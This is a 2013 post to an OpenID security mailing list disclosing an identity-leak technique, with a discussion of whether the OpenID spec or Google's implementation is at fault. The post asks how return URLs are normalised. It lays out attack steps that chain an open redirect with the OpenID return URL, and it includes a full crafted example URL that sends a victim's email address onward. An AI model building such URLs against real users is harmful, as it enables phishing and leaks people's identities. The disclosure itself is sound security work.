[security] OpenID identity leaks

Andris Atteka andris.atteka at gmail.com
Sat Dec 21 09:12:05 UTC 2013 

Hi Everyone,

Google's Security Team suggested to ask this question here.

Attacker can perform the following steps:
1) Find an open redirect in some major website that leads to attacker's
website (and append fragment identifier to this URL)
2) Craft a URL and set redirect_url to the open redirect
3) Trick the victim into visiting the URL
As the URL belongs to a major website, most likely victim will accept the
RP and his identity will be leaked to attacker's site.

Here's an example (Google itself has some nice open redirects):
https://www.google.com/accounts/o8/ud?openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.ext0=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.realm=https%3A%2F%2Fwww.google.com%2F&openid.return_to=https%3A%2F%2Fwww.google.com%2Fsearch%3FbtnI%26q%3Dallinurl%253A%252F%252Flva.lv%23aaa&openid.ui.icon=true&openid.ui.lang=en-US&openid.ui.mode=popup&third_party_login=false

This can even be extended so that user doesn't have to accept RP. For this
attacker would have to find an open redirect that shares domain with some
valid OpenID consumer (some major sites actually do this). In this case
user wouldn't even notice the identity leak.

Is this only a bug in Google's OpenID implementation or a bug in the OpenID
spec itself?

I do see the OpenID spec talking about normalization of identifiers
(including removal of fragment and fragment identifier). Does the same
apply to redirect_url? If not, would it be reasonable to include this in
the spec?

Regards,
Andris Atteka
andrisatteka.blogspot.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.openid.net/pipermail/openid-security/attachments/20131221/b0f5495f/attachment.html>

More information about the security mailing list